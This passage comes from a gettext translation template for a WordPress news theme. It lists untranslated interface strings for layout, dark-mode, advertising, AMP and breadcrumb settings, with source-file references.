"Background 1" msgstr "" #: backend/configs.php:290 backend/configs.php:321 msgid "Background 1 (Big)" msgstr "" #: backend/configs.php:291 backend/configs.php:322 msgid "Background 2" msgstr "" #: backend/configs.php:292 backend/configs.php:323 msgid "Background 2 (Big)" msgstr "" #: backend/configs.php:293 backend/configs.php:324 msgid "Background 3" msgstr "" #: backend/configs.php:294 backend/configs.php:325 msgid "Background 3 (Big)" msgstr "" #: backend/configs.php:295 backend/configs.php:326 msgid "Background 4" msgstr "" #: backend/configs.php:296 backend/configs.php:327 msgid "Background 4 (Big)" msgstr "" #: backend/panels/header-style.php:191 backend/panels/header.php:682 #: backend/panels/privacy.php:40 msgid "Background Color" msgstr "" #: backend/mega-menu.php:222 msgid "Background color" msgstr "" #: backend/panels/general.php:49 msgid "Backup all your settings to a file or restore your settings." msgstr "" #: templates/single/reviews.php:189 msgid "Bad Stuff" msgstr "" #: backend/configs.php:843 msgid "Banner (468x60)" msgstr "" #: backend/panels/single-post.php:1761 msgid "Bar Color" msgstr "" #: backend/panels/single-post.php:1753 msgid "Bar Height" msgstr "" #: backend/panels/single-post.php:350 msgid "" "Be keep up! Get the latest breaking news delivered straight to your inbox." msgstr "" #: backend/class-tgm-plugin-activation.php:393 backend/install-plugins.php:79 msgid "Begin activating plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:383 backend/install-plugins.php:78 msgid "Begin installing plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:388 msgid "Begin updating plugin" msgstr "" #: backend/panels/design.php:355 msgid "" "Below is the list of image sizes. Enable or disable any size you would like." msgstr "" #: backend/panels/single-post.php:576 msgid "Big Avatar" msgstr "" #: backend/configs.php:858 msgid "Billboard (970x250)" msgstr "" #: backend/panels/typography.php:1030 msgid "Block Heading" msgstr "" #: backend/panels/typography.php:806 backend/panels/typography.php:812 msgid "Block Quote" msgstr "" #: backend/panels/blog-pages.php:571 msgid "Blog & Archive" msgstr "" #: backend/category-settings.php:323 backend/panels/blog-pages.php:340 #: backend/panels/blog-pages.php:827 backend/panels/blog-pages.php:1241 #: backend/panels/blog-pages.php:1649 backend/panels/blog-pages.php:2141 #: backend/panels/bookmark.php:243 backend/panels/bookmark.php:691 msgid "Blog Design" msgstr "" #: backend/panels/blog-pages.php:588 msgid "Blog Index" msgstr "" #: backend/panels/blog-pages.php:250 backend/panels/blog-pages.php:731 #: backend/panels/blog-pages.php:737 backend/panels/blog-pages.php:1145 #: backend/panels/blog-pages.php:1151 backend/panels/blog-pages.php:1553 #: backend/panels/blog-pages.php:1559 backend/panels/blog-pages.php:2045 #: backend/panels/blog-pages.php:2051 backend/panels/bookmark.php:149 #: backend/panels/bookmark.php:154 backend/panels/bookmark.php:594 #: backend/panels/single-post.php:1336 msgid "Blog Layout" msgstr "" #: backend/category-settings.php:238 msgid "Blog Listing Layout" msgstr "" #: backend/mega-menu.php:135 msgid "Blog Listing Layout: " msgstr "" #: backend/panels/blog-pages.php:1442 backend/panels/blog-pages.php:1850 #: backend/panels/blog-pages.php:2342 backend/panels/bookmark.php:556 msgid "Blog Pagination" msgstr "" #: backend/panels/blog-pages.php:785 backend/panels/blog-pages.php:1199 #: backend/panels/blog-pages.php:1607 backend/panels/blog-pages.php:2099 #: backend/panels/bookmark.php:202 backend/panels/bookmark.php:650 msgid "Blog Sidebar" msgstr "" #: templates/parts.php:624 msgid "Bloglovin" msgstr "" #: backend/panels/socials.php:98 msgid "Bloglovin URL" msgstr "" #: backend/panels/typography.php:35 msgid "Body Font" msgstr "" #: backend/panels/single-post.php:209 msgid "Bold" msgstr "" #: backend/panels/single-post.php:210 msgid "Bold Italic" msgstr "" #: backend/category-settings.php:389 backend/panels/block-classic.php:81 #: backend/panels/block-grid.php:81 backend/panels/block-grid.php:246 #: backend/panels/block-grid.php:411 backend/panels/block-grid.php:584 #: backend/panels/block-grid.php:771 backend/panels/block-list.php:89 #: backend/panels/block-list.php:262 backend/panels/block-list.php:443 #: backend/panels/block-list.php:638 backend/panels/blog-pages.php:416 #: backend/panels/blog-pages.php:903 backend/panels/blog-pages.php:1317 #: backend/panels/blog-pages.php:1725 backend/panels/blog-pages.php:2217 #: backend/panels/bookmark.php:315 backend/panels/bookmark.php:763 msgid "Bookmark Icon" msgstr "" #: backend/panels/bookmark.php:14 backend/panels/bookmark.php:37 msgid "Bookmark System" msgstr "" #: backend/panels/logo.php:149 msgid "Bookmarklet" msgstr "" #: backend/configs.php:330 backend/configs.php:874 msgid "Border" msgstr "" #: backend/configs.php:331 msgid "Border (Big)" msgstr "" #: backend/panels/header-style.php:621 msgid "Border Top & Bottom Shadow" msgstr "" #: backend/panels/amp.php:481 msgid "Bottom - Ad Type" msgstr "" #: backend/panels/amp.php:509 msgid "Bottom - Adsense Size" msgstr "" #: backend/panels/amp.php:521 msgid "Bottom - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:493 msgid "Bottom - Data Ad Client" msgstr "" #: backend/panels/amp.php:501 msgid "Bottom - Data Ad Slot" msgstr "" #: backend/panels/blog-pages.php:658 msgid "Bottom Area Template Shortcode" msgstr "" #: backend/configs.php:334 backend/panels/blog-pages.php:51 #: backend/panels/blog-pages.php:617 backend/panels/blog-pages.php:1935 #: backend/panels/header-style.php:72 backend/panels/header-style.php:617 #: backend/single-metaboxes.php:134 backend/single-metaboxes.php:911 msgid "Bottom Border" msgstr "" #: backend/configs.php:335 msgid "Bottom Border (Big)" msgstr "" #: backend/panels/single-post.php:845 msgid "Bottom Content Share Bar" msgstr "" #: backend/configs.php:332 msgid "Bottom Dotted" msgstr "" #: backend/configs.php:333 msgid "Bottom Dotted (Big)" msgstr "" #: backend/single-metaboxes.php:692 msgid "Bottom Entry Widgets Area" msgstr "" #: backend/panels/single-post.php:327 backend/panels/single-post.php:333 msgid "Bottom Newsletter" msgstr "" #: backend/configs.php:374 msgid "Bottom Right" msgstr "" #: backend/configs.php:375 msgid "Bottom Right (Big Icon)" msgstr "" #: backend/panels/amp.php:475 msgid "Bottom Single Content Ad Settings" msgstr "" #: backend/panels/block-grid.php:672 backend/panels/block-grid.php:859 #: backend/panels/block-list.php:524 backend/panels/block-list.php:719 msgid "Box Color" msgstr "" #: backend/panels/privacy.php:21 msgid "Box Position" msgstr "" #: backend/panels/block-grid.php:526 backend/panels/block-grid.php:713 #: backend/panels/block-list.php:377 backend/panels/block-list.php:572 msgid "Box Style" msgstr "" #: backend/panels/block-grid.php:522 backend/panels/block-grid.php:709 #: backend/panels/block-list.php:373 backend/panels/block-list.php:568 msgid "boxed grid" msgstr "" #: backend/category-settings.php:246 backend/configs.php:459 #: backend/panels/block-grid.php:512 msgid "Boxed Grid 1" msgstr "" #: backend/category-settings.php:247 backend/configs.php:463 #: backend/panels/block-grid.php:699 msgid "Boxed Grid 2" msgstr "" #: backend/category-settings.php:251 backend/configs.php:479 #: backend/panels/block-list.php:363 msgid "Boxed List 1" msgstr "" #: backend/category-settings.php:252 backend/configs.php:483 #: backend/panels/block-list.php:558 msgid "Boxed List 2" msgstr "" #: backend/category-settings.php:100 backend/panels/typography.php:845 msgid "Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:14 backend/panels/breadcrumb.php:30 msgid "Breadcrumb Bar" msgstr "" #: backend/panels/color.php:140 msgid "Breadcrumb Color" msgstr "" #: backend/panels/typography.php:853 msgid "Breadcrumb Font" msgstr "" #: backend/install-plugins.php:43 msgid "Breadcrumb NavXT" msgstr "" #: backend/panels/optimized.php:138 msgid "" "Breadcrumbs are a hierarchy of links displayed in search engines and your " "website. This option requests the \"Breadcrumb NavXT\"." msgstr "" #: backend/panels/optimized.php:137 msgid "Breadcrumbs bar" msgstr "" #: backend/single-metaboxes.php:744 msgid "Break Page Selection" msgstr "" #: backend/configs.php:845 msgid "Button (125x125)" msgstr "" #: backend/panels/typography.php:636 msgid "Button Font" msgstr "" #: backend/panels/typography.php:630 msgid "Button Font Settings" msgstr "" #: backend/panels/ads.php:512 msgid "Button Text Color" msgstr "" #: backend/panels/single-post.php:488 msgid "" "By default, Primary category setting will only apply to the post listing." msgstr "" #: backend/panels/privacy.php:35 msgid "" "By using this site, you agree to the Privacy Policy and Terms of Use." msgstr "" #: backend/panels/design.php:453 msgid "Carousel Free Scroll" msgstr "" #: backend/panels/blog-pages.php:17 msgid "Category" msgstr "" #: backend/configs.php:404 backend/panels/design.php:270 msgid "category (Categories)" msgstr "" #: backend/panels/breadcrumb.php:72 msgid "Category Breadcrumb" msgstr "" #: templates/parts.php:756 msgid "category featured" msgstr "" #: backend/category-settings.php:73 backend/category-settings.php:78 #: backend/panels/blog-pages.php:77 backend/panels/blog-pages.php:82 msgid "Category Header" msgstr "" #: backend/mega-menu.php:120 msgid "Category Mega Menu" msgstr "" #: backend/panels/design.php:145 msgid "Category Meta Icon" msgstr "" #: backend/configs.php:379 backend/panels/login.php:41 msgid "Center" msgstr "" #: backend/configs.php:380 msgid "Center (Big Icon)" msgstr "" #: backend/panels/header.php:344 msgid "Center Logo" msgstr "" #: backend/panels/amp.php:110 backend/panels/footer.php:171 msgid "Centered Mode" msgstr "" #: backend/panels/block-classic.php:163 backend/panels/block-grid.php:163 #: backend/panels/block-grid.php:328 backend/panels/block-grid.php:493 #: backend/panels/block-grid.php:666 backend/panels/block-grid.php:853 #: backend/panels/block-list.php:171 backend/panels/block-list.php:344 #: backend/panels/block-list.php:539 backend/panels/block-list.php:734 msgid "Centering Content" msgstr "" #: backend/panels/block-classic.php:164 backend/panels/block-grid.php:164 #: backend/panels/block-grid.php:329 backend/panels/block-grid.php:494 #: backend/panels/block-grid.php:667 backend/panels/block-grid.php:854 #: backend/panels/block-list.php:172 backend/panels/block-list.php:345 #: backend/panels/block-list.php:540 backend/panels/block-list.php:735 msgid "Centering text and elements for the post listing." msgstr "" #: backend/panels/amp.php:111 backend/panels/footer.php:172 msgid "Centering this section." msgstr "" #: backend/panels/block-classic.php:27 msgid "classic" msgstr "" #: backend/category-settings.php:243 backend/configs.php:447 #: backend/panels/block-classic.php:17 msgid "Classic (Standard)" msgstr "" #: backend/panels/sidebar.php:40 msgid "" "Click on the \"Create Sidebar\" button, then input a name/ID (without " "special charsets and spacing) into the field to create a new sidebar." msgstr "" #: backend/panels/sidebar.php:41 msgid "Click then Input ID to Create a Sidebar" msgstr "" #: backend/panels/header.php:367 msgid "Collapse Section" msgstr "" #: backend/panels/header.php:440 backend/panels/header.php:493 msgid "Collapse Section - Text Color" msgstr "" #: backend/panels/header.php:429 backend/panels/header.php:482 msgid "Collapse Section Background" msgstr "" #: backend/mega-menu.php:218 msgid "Color" msgstr "" #: backend/panels/header.php:321 msgid "" "Color settings will apply to the tablet and mobile header. Leave blank to " "set as the desktop navigation colors." msgstr "" #: backend/panels/single-post.php:714 backend/panels/single-post.php:853 #: backend/panels/single-post.php:991 backend/panels/single-post.php:1612 msgid "Colorful Icons" msgstr "" #: backend/panels/footer.php:106 msgid "Column Border" msgstr "" #: backend/mega-menu.php:161 msgid "Column Mega Menu" msgstr "" #: backend/category-settings.php:282 backend/panels/blog-pages.php:282 #: backend/panels/blog-pages.php:769 backend/panels/blog-pages.php:1183 #: backend/panels/blog-pages.php:1591 backend/panels/blog-pages.php:2083 #: backend/panels/bookmark.php:186 backend/panels/bookmark.php:626 #: backend/panels/bookmark.php:634 msgid "Columns Gap" msgstr "" #: backend/category-settings.php:258 backend/panels/blog-pages.php:258 #: backend/panels/blog-pages.php:745 backend/panels/blog-pages.php:1567 #: backend/panels/blog-pages.php:2059 backend/panels/bookmark.php:162 msgid "Columns on Desktop" msgstr "" #: backend/category-settings.php:274 backend/panels/blog-pages.php:274 #: backend/panels/blog-pages.php:761 backend/panels/blog-pages.php:1175 #: backend/panels/blog-pages.php:1583 backend/panels/blog-pages.php:2075 #: backend/panels/bookmark.php:178 backend/panels/bookmark.php:618 msgid "Columns on Mobile" msgstr "" #: backend/category-settings.php:266 backend/panels/blog-pages.php:266 #: backend/panels/blog-pages.php:753 backend/panels/blog-pages.php:1167 #: backend/panels/blog-pages.php:1575 backend/panels/blog-pages.php:2067 #: backend/panels/bookmark.php:170 backend/panels/bookmark.php:610 msgid "Columns on Tablet" msgstr "" #: backend/mega-menu.php:181 backend/panels/blog-pages.php:1159 #: backend/panels/bookmark.php:602 backend/panels/header.php:126 msgid "Columns per Row" msgstr "" #: backend/configs.php:407 backend/panels/design.php:273 msgid "comment (Comments)" msgstr "" #: backend/panels/amp.php:213 msgid "Comment Box" msgstr "" #: backend/panels/design.php:124 msgid "Comment Meta Icon" msgstr "" #: backend/panels/single-post.php:1203 msgid "Comments" msgstr "Comentários" #: comments.php:32 msgid "Comments are closed." msgstr "" #: backend/panels/privacy.php:33 msgid "Content" msgstr "" #: backend/panels/single-post.php:155 msgid "Content Area" msgstr "" #: backend/panels/typography.php:722 msgid "Content Font Size (Small Headline)" msgstr "" #: backend/panels/typography.php:779 msgid "Content Font Size (Small Tagline)" msgstr "" #: backend/panels/table-contents.php:134 msgid "Contents" msgstr "" #: templates/single/next-posts.php:43 msgid "Continue Reading" msgstr "" #: backend/panels/single-post.php:813 backend/panels/single-post.php:952 #: backend/panels/single-post.php:1090 msgid "Copy Link" msgstr "" #: backend/panels/footer.php:207 msgid "Copyright - Font Size" msgstr "" #: backend/panels/footer.php:199 msgid "Copyright Menu" msgstr "" #: backend/panels/footer.php:213 msgid "Copyright Menu - Font Size" msgstr "" #: backend/panels/amp.php:124 backend/panels/amp.php:130 #: backend/panels/footer.php:185 msgid "Copyright Section" msgstr "" #: backend/panels/footer.php:191 msgid "Copyright Text" msgstr "" #: backend/panels/newsletter.php:71 msgid "Cover Image" msgstr "" #: backend/panels/design.php:331 msgid "Create a New Crop Size" msgstr "" #: backend/panels/sidebar.php:39 msgid "Create new or delete exist sidebars." msgstr "" #: backend/single-metaboxes.php:516 msgid "Create your review criteria based on the type you choose." msgstr "" #: backend/single-metaboxes.php:523 msgid "Criteria" msgstr "" #: backend/panels/design.php:313 msgid "Crop Position" msgstr "" #: backend/panels/reaction.php:51 msgid "Cry" msgstr "" #: backend/single-metaboxes.php:598 msgid "Currency" msgstr "" #: backend/configs.php:410 msgid "custom (Custom)" msgstr "" #: backend/category-settings.php:351 msgid "Custom Below" msgstr "" #: backend/panels/single-post.php:647 msgid "Custom date format for the last updated info." msgstr "" #: backend/panels/design.php:230 backend/single-metaboxes.php:283 #: backend/single-metaboxes.php:289 msgid "Custom Entry Meta" msgstr "" #: backend/category-settings.php:336 backend/panels/blog-pages.php:358 #: backend/panels/blog-pages.php:845 backend/panels/blog-pages.php:1259 #: backend/panels/blog-pages.php:1667 backend/panels/blog-pages.php:2159 #: backend/panels/bookmark.php:258 backend/panels/bookmark.php:706 msgid "Custom Featured Ratio" msgstr "" #: backend/panels/header.php:602 msgid "Custom Forget Password URL" msgstr "" #: backend/panels/ads.php:102 backend/panels/ads.php:291 msgid "Custom Image" msgstr "" #: backend/panels/ads.php:193 backend/panels/ads.php:382 msgid "Custom Image - Ad Destination" msgstr "" #: backend/panels/ads.php:179 backend/panels/ads.php:368 msgid "Custom Image - Ad Image" msgstr "" #: backend/panels/ads.php:186 backend/panels/ads.php:375 msgid "Custom Image - Dark Mode Ad Image" msgstr "" #: backend/panels/ads.php:200 backend/panels/ads.php:389 msgid "Custom Image - Max Width" msgstr "" #: backend/panels/ads.php:173 backend/panels/ads.php:362 msgid "Custom Image Settings" msgstr "" #: backend/panels/login.php:25 msgid "Custom Login Screen" msgstr "" #: backend/panels/header.php:595 msgid "Custom Register URL" msgstr "" #: backend/panels/design.php:685 msgid "Custom Round Corner" msgstr "" #: backend/panels/header.php:231 msgid "Custom Search SVG" msgstr "" #: backend/category-settings.php:402 backend/configs.php:210 msgid "Custom Settings Below" msgstr "" #: backend/panels/ads.php:135 backend/panels/ads.php:324 msgid "Custom Size Below" msgstr "" #: backend/panels/socials.php:198 msgid "Custom Social 1 - Color" msgstr "" #: backend/panels/socials.php:189 msgid "Custom Social 1 - Icon" msgstr "" #: backend/panels/socials.php:183 msgid "Custom Social 1 - Name" msgstr "" #: backend/panels/socials.php:177 msgid "Custom social 1 - URL" msgstr "" #: backend/panels/socials.php:225 msgid "Custom Social 2 - Color" msgstr "" #: backend/panels/socials.php:216 msgid "Custom Social 2 - Icon" msgstr "" #: backend/panels/socials.php:210 msgid "Custom Social 2 - Name" msgstr "" #: backend/panels/socials.php:204 msgid "Custom social 2 - URL" msgstr "" #: backend/panels/socials.php:252 msgid "Custom Social 3 - Color" msgstr "" #: backend/panels/socials.php:243 msgid "Custom Social 3 - Icon" msgstr "" #: backend/panels/socials.php:237 msgid "Custom Social 3 - Name" msgstr "" #: backend/panels/socials.php:231 msgid "Custom social 3 - URL" msgstr "" #: backend/panels/socials.php:165 msgid "Custom Social Profiles" msgstr "" #: backend/panels/block-grid.php:679 backend/panels/block-grid.php:866 #: backend/panels/block-list.php:531 backend/panels/block-list.php:726 msgid "Dark - Box Color" msgstr "" #: backend/panels/woocommerce.php:196 msgid "Dark - Price Color" msgstr "" #: backend/panels/woocommerce.php:212 msgid "Dark - Review Start Color" msgstr "" #: backend/panels/color.php:57 msgid "Dark Accent Color" msgstr "" #: backend/panels/color.php:52 msgid "Dark Accent Colors" msgstr "" #: backend/panels/blog-pages.php:52 backend/panels/blog-pages.php:618 #: backend/panels/blog-pages.php:1936 backend/panels/header-style.php:73 #: backend/panels/header-style.php:619 backend/single-metaboxes.php:135 #: backend/single-metaboxes.php:912 msgid "Dark Bottom Border" msgstr "" #: backend/panels/blog-pages.php:2398 msgid "Dark Header Image" msgstr "" #: backend/panels/dark-mode.php:16 backend/panels/dark-mode.php:28 msgid "Dark Mode" msgstr "" #: backend/panels/heading.php:74 backend/panels/heading.php:159 msgid "Dark Mode - Accent Heading Color" msgstr "" #: backend/mega-menu.php:249 msgid "Dark Mode - Attachment/SVG URL" msgstr "" #: backend/mega-menu.php:230 backend/panels/header.php:698 #: backend/panels/privacy.php:56 msgid "Dark Mode - Background Color" msgstr "" #: backend/panels/ads.php:520 msgid "Dark Mode - Button Text Color" msgstr "" #: backend/mega-menu.php:226 msgid "Dark Mode - Color" msgstr "" #: backend/panels/footer.php:152 msgid "Dark Mode - Copyright Logo" msgstr "" #: backend/panels/color.php:65 msgid "Dark Mode - Dark Accent Color" msgstr "" #: backend/panels/bookmark.php:128 backend/panels/bookmark.php:471 msgid "Dark Mode - Description Image" msgstr "" #: backend/panels/footer.php:40 msgid "Dark Mode - Footer Background" msgstr "" #: backend/panels/header.php:580 msgid "Dark Mode - Form Logo" msgstr "" #: backend/panels/color.php:36 msgid "Dark Mode - Global Highlight Color" msgstr "" #: backend/panels/blog-pages.php:1982 msgid "Dark Mode - Header Background" msgstr "" #: backend/panels/single-post.php:226 msgid "Dark Mode - Hyperlink Color" msgstr "" #: backend/panels/logo.php:54 msgid "Dark Mode - Main Logo" msgstr "" #: backend/panels/logo.php:103 msgid "Dark Mode - Mobile Logo" msgstr "" #: backend/panels/heading.php:66 backend/panels/heading.php:151 msgid "Dark Mode - Primary Heading Color" msgstr "" #: backend/panels/logo.php:70 msgid "Dark Mode - Retina Main Logo" msgstr "" #: backend/panels/ads.php:229 msgid "Dark Mode - Section Background" msgstr "" #: backend/panels/ads.php:506 msgid "Dark Mode - Slide Up Background" msgstr "" #: backend/category-settings.php:44 backend/panels/design.php:60 #: backend/panels/header.php:706 backend/panels/privacy.php:64 msgid "Dark Mode - Text Color" msgstr "" #: backend/panels/single-post.php:253 msgid "Dark Mode - Underline Color" msgstr "" #: backend/panels/color.php:86 msgid "Dark Mode Background" msgstr "" #: backend/panels/color.php:81 backend/panels/header-style.php:185 #: backend/panels/header-style.php:474 backend/panels/header-style.php:740 #: backend/panels/header.php:456 msgid "Dark Mode Colors" msgstr "" #: backend/mega-menu.php:153 msgid "Dark Text" msgstr "" #: backend/panels/header-style.php:620 msgid "Dark Top & Bottom Border" msgstr "" #: backend/configs.php:403 backend/panels/design.php:269 msgid "date (Publish Date)" msgstr "" #: backend/panels/single-post.php:646 msgid "Date Format" msgstr "" #: backend/panels/reaction.php:47 msgid "Dead" msgstr "" #: backend/panels/amp.php:56 msgid "Debug Mode" msgstr "" #: backend/panels/amp.php:63 msgid "" "Debug mode will provide more information about the each AMP page such as CSS " "usages, plugin scripts etc..." msgstr "" #: backend/panels/amp.php:214 backend/panels/blog-pages.php:49 #: backend/panels/blog-pages.php:615 backend/panels/blog-pages.php:1933 #: backend/panels/design.php:676 backend/single-metaboxes.php:146 #: backend/single-metaboxes.php:157 backend/single-metaboxes.php:923 #: backend/single-metaboxes.php:934 msgid "Default" msgstr "" #: backend/panels/footer.php:65 backend/panels/header-style.php:91 #: backend/panels/header-style.php:379 backend/panels/header-style.php:646 #: backend/panels/header.php:288 msgid "Default (Dark Text)" msgstr "" #: backend/panels/design.php:352 msgid "Default Crop Size Settings" msgstr "" #: backend/panels/dark-mode.php:42 msgid "Default Dark Mode" msgstr "" #: backend/category-settings.php:469 backend/category-settings.php:499 msgid "Default from Category Settings" msgstr "" #: backend/panels/amp.php:187 backend/panels/amp.php:196 #: backend/panels/amp.php:205 backend/panels/amp.php:223 #: backend/panels/amp.php:232 msgid "Default from Single Settings" msgstr "" #: backend/panels/heading.php:97 msgid "Default layout is based on the \"Global Heading Layout\" setting." msgstr "" #: backend/panels/logo.php:30 msgid "Default Logos" msgstr "" #: backend/panels/single-post.php:1187 msgid "Default Review Image" msgstr "" #: backend/panels/single-post.php:1164 msgid "Default Review Type" msgstr "" #: backend/panels/typography.php:1111 msgid "Default Widgets" msgstr "" #: backend/panels/design.php:327 msgid "Define Custom Crop Sizes" msgstr "" #: backend/panels/ads.php:494 backend/panels/newsletter.php:111 msgid "Delay Time" msgstr "" #: backend/panels/adblock.php:33 backend/panels/blog-pages.php:2411 #: backend/panels/newsletter.php:41 #: woocommerce/single-product/tabs/description.php:24 msgid "Description" msgstr "" #: backend/panels/bookmark.php:120 backend/panels/bookmark.php:463 msgid "Description Image" msgstr "" #: backend/category-settings.php:441 backend/panels/blog-pages.php:468 #: backend/panels/blog-pages.php:955 backend/panels/blog-pages.php:1369 #: backend/panels/blog-pages.php:1777 backend/panels/blog-pages.php:2269 #: backend/panels/bookmark.php:367 backend/panels/bookmark.php:815 msgid "Desktop - Title Font Size" msgstr "" #: backend/panels/header.php:277 msgid "Destination Link" msgstr "" #: backend/panels/adblock.php:14 msgid "" "Detecting most of the AdBlock extensions and show a popup to disable the " "extension." msgstr "" #: templates/parts.php:627 msgid "Digg" msgstr "" #: backend/panels/socials.php:104 msgid "Digg URL" msgstr "" #: backend/panels/single-post.php:1139 backend/single-metaboxes.php:648 msgid "Directly Redirect" msgstr "" #: backend/single-metaboxes.php:649 msgid "" "Directly redirect to the sponsor website when clicking on the post listing " "title." msgstr "" #: backend/panels/single-post.php:1140 msgid "" "Directly redirect to the sponsored URL when visitors click on the post title " "in the blog listing." msgstr "" #: backend/category-settings.php:106 backend/category-settings.php:118 #: backend/category-settings.php:317 backend/category-settings.php:350 #: backend/category-settings.php:473 backend/category-settings.php:503 #: backend/configs.php:197 backend/configs.php:297 backend/configs.php:303 #: backend/configs.php:337 backend/configs.php:343 backend/configs.php:358 #: backend/configs.php:381 backend/configs.php:387 backend/configs.php:427 #: backend/configs.php:433 backend/configs.php:587 #: backend/panels/blog-pages.php:326 backend/panels/blog-pages.php:497 #: backend/panels/blog-pages.php:527 backend/panels/blog-pages.php:813 #: backend/panels/blog-pages.php:984 backend/panels/blog-pages.php:1014 #: backend/panels/blog-pages.php:1227 backend/panels/blog-pages.php:1398 #: backend/panels/blog-pages.php:1428 backend/panels/blog-pages.php:1635 #: backend/panels/blog-pages.php:1806 backend/panels/blog-pages.php:1836 #: backend/panels/blog-pages.php:2127 backend/panels/blog-pages.php:2298 #: backend/panels/blog-pages.php:2328 backend/panels/bookmark.php:229 #: backend/panels/bookmark.php:396 backend/panels/bookmark.php:415 #: backend/panels/bookmark.php:677 backend/panels/bookmark.php:844 #: backend/panels/bookmark.php:871 backend/panels/breadcrumb.php:55 #: backend/panels/breadcrumb.php:66 backend/panels/breadcrumb.php:77 #: backend/panels/breadcrumb.php:88 backend/panels/breadcrumb.php:99 #: backend/panels/footer.php:99 backend/panels/page.php:87 #: backend/panels/single-post.php:239 backend/panels/single-post.php:454 #: backend/panels/single-post.php:1181 backend/panels/single-post.php:1223 #: backend/single-metaboxes.php:147 backend/single-metaboxes.php:159 #: backend/single-metaboxes.php:362 backend/single-metaboxes.php:410 #: backend/single-metaboxes.php:488 backend/single-metaboxes.php:653 #: backend/single-metaboxes.php:686 backend/single-metaboxes.php:697 #: backend/single-metaboxes.php:716 backend/single-metaboxes.php:826 #: backend/single-metaboxes.php:845 backend/single-metaboxes.php:864 #: backend/single-metaboxes.php:875 backend/single-metaboxes.php:924 #: backend/single-metaboxes.php:936 msgid "Disable" msgstr "" #: backend/panels/login.php:119 backend/panels/login.php:146 msgid "Disable Admin Bar" msgstr "" #: backend/panels/login.php:120 backend/panels/login.php:147 msgid "Disable admin bar for all users except for Administrators" msgstr "" #: backend/panels/single-post.php:1232 msgid "Disable All Comments" msgstr "" #: backend/panels/ads.php:60 msgid "" "Disable auto Adsense on Woocommerce such as shop, product, cart, checkout...." msgstr "" #: backend/panels/amp.php:216 msgid "Disable comment form on AMP site." msgstr "" #: backend/panels/optimized.php:43 msgid "Disable Dashicons" msgstr "" #: backend/panels/optimized.php:81 msgid "Disable Default Fonts" msgstr "" #: backend/panels/optimized.php:51 msgid "Disable Gutenberg Style on Page Builder" msgstr "" #: backend/panels/login.php:126 backend/panels/login.php:153 msgid "Disable Language Bar" msgstr "" #: backend/panels/amp.php:188 backend/panels/amp.php:197 #: backend/panels/amp.php:206 backend/panels/amp.php:215 #: backend/panels/amp.php:224 backend/panels/amp.php:233 msgid "Disable on AMP" msgstr "" #: backend/panels/ads.php:59 msgid "Disable on Woocommerce Pages" msgstr "" #: backend/panels/blog-pages.php:83 msgid "Disable or select a category header style for the category pages." msgstr "" #: backend/category-settings.php:79 msgid "Disable or select a category header style for this category page." msgstr "" #: backend/category-settings.php:366 backend/panels/block-classic.php:59 #: backend/panels/block-grid.php:59 backend/panels/block-grid.php:224 #: backend/panels/block-grid.php:389 backend/panels/block-grid.php:562 #: backend/panels/block-grid.php:749 backend/panels/block-list.php:67 #: backend/panels/block-list.php:240 backend/panels/block-list.php:421 #: backend/panels/block-list.php:616 backend/panels/blog-pages.php:393 #: backend/panels/blog-pages.php:880 backend/panels/blog-pages.php:1294 #: backend/panels/blog-pages.php:1702 backend/panels/blog-pages.php:2194 #: backend/panels/bookmark.php:292 backend/panels/bookmark.php:740 msgid "Disable or select setting for entry review meta." msgstr "" #: backend/category-settings.php:382 backend/panels/block-classic.php:74 #: backend/panels/block-grid.php:74 backend/panels/block-grid.php:239 #: backend/panels/block-grid.php:404 backend/panels/block-grid.php:577 #: backend/panels/block-grid.php:764 backend/panels/block-list.php:82 #: backend/panels/block-list.php:255 backend/panels/block-list.php:436 #: backend/panels/block-list.php:631 backend/panels/blog-pages.php:409 #: backend/panels/blog-pages.php:896 backend/panels/blog-pages.php:1310 #: backend/panels/blog-pages.php:1718 backend/panels/blog-pages.php:2210 #: backend/panels/bookmark.php:308 backend/panels/bookmark.php:756 msgid "Disable or select setting for the post format." msgstr "" #: backend/panels/blog-pages.php:425 backend/panels/blog-pages.php:912 #: backend/panels/blog-pages.php:1326 backend/panels/blog-pages.php:1734 #: backend/panels/blog-pages.php:2226 backend/panels/bookmark.php:324 #: backend/panels/bookmark.php:772 msgid "Disable or select settings for the post excerpt." msgstr "" #: backend/panels/optimized.php:59 msgid "Disable Polyfill Script" msgstr "" #: backend/panels/design.php:673 msgid "Disable round corner style for whole the website." msgstr "" #: backend/panels/optimized.php:35 msgid "Disable Srcset" msgstr "" #: backend/panels/optimized.php:36 msgid "Disable Srcset to optimize page speed score on mobile device." msgstr "" #: backend/panels/amp.php:189 backend/panels/amp.php:198 msgid "Disable the Author Card in the AMP mode." msgstr "" #: backend/panels/optimized.php:52 msgid "Disable the block style css on the page built with Page Builder." msgstr "" #: backend/panels/login.php:127 backend/panels/login.php:154 msgid "Disable the language bar in the login screen." msgstr "" #: backend/panels/amp.php:207 msgid "Disable the Next/Prev Articles section in the AMP mode." msgstr "" #: backend/panels/amp.php:225 msgid "Disable the related section in the AMP mode." msgstr "" #: backend/panels/amp.php:234 msgid "Disable the single post sidebar section in the AMP mode." msgstr "" #: backend/single-metaboxes.php:143 msgid "Disable the top ad site for this page." msgstr "" #: backend/panels/optimized.php:60 msgid "" "Disable wp-polyfill script (supporting older browsers that do not understand " "ES6) to improve the page speed score." msgstr "" #: backend/panels/single-post.php:1371 msgid "Disabled" msgstr "" #: backend/single-metaboxes.php:568 msgid "disadvantage item" msgstr "" #: backend/single-metaboxes.php:560 msgid "Disadvantages" msgstr "" #: backend/class-tgm-plugin-activation.php:407 msgid "Dismiss this notice" msgstr "" #: backend/mega-menu.php:235 msgid "" "Display a icon before this menu item label. You can choose font icon or " "custom attachment image/SVG." msgstr "" #: backend/mega-menu.php:211 msgid "Display a sub label after this navigation label." msgstr "" #: backend/panels/design.php:185 msgid "Display Human Time (Ago)" msgstr "" #: backend/panels/newsletter.php:93 msgid "Display Mode" msgstr "" #: backend/single-metaboxes.php:745 msgid "" "Display page selected section when you use break pages for a lengthy content " "post." msgstr "" #: backend/panels/woocommerce.php:182 msgid "Display Percentage saved on WooCommerce sale products" msgstr "" #: backend/panels/single-post.php:1275 backend/panels/table-contents.php:141 #: backend/single-metaboxes.php:736 msgid "Display Position" msgstr "" #: backend/panels/ads.php:428 backend/panels/amp.php:588 msgid "Display Positions" msgstr "" #: 